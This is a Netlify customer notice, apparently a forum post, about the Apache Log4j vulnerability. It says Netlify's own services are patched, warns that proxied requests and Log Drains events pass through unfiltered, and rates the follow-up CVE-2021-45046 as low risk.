Like you, Netlify became aware of the vulnerability in Apache Log4j (CVE-2021-44228) last week. We immediately ensured that no customer-facing nor web-visitor-facing aspects of our service were vulnerable.
We are posting this note to confirm and communicate our security checks, as well as encourage you to conduct your own checks against third party services you may be using to build or motion your websites and applications hosted on Netlify.
At a high level, none of our servers or services (e.g., via API or WebSocket connection) are vulnerable; systems with dependencies on Apache Log4j have all been patched to the latest non-vulnerable version. We validated this by utilizing various scanning tools backed by a comprehensive manual audit of our core services.
However, Netlify does not filter or prevent traffic containing exploits. We will pass on any unmodified requests if you use our reverse proxying feature. Please ensure that any systems we connect to on your behalf are not vulnerable! Similarly, we pass unmodified log events through our Log Drains service, and customers should ensure that any systems configured to receive Netlify Log Drains are not vulnerable.
Our team is aware of the additional vulnerability in log4j as well. Due to the LOW risk nature of CVE-2021-45046 we will not make a separate customer-facing announcement about it. Since this additional vulnerability cannot cause Confidentiality or Integrity violations directly, we agree that this vulnerability is LOW risk, and if our assessments show that there is remediation work to be performed for CVE-2021-45046 , we will be prioritizing that work using our normal internal processes.
We will continue to stay vigilant and communicate with you if there are any further developments. In the meantime, please post below if you have questions or concerns! (Members of paid teams, you can also reach us through netlify.com/support with questions)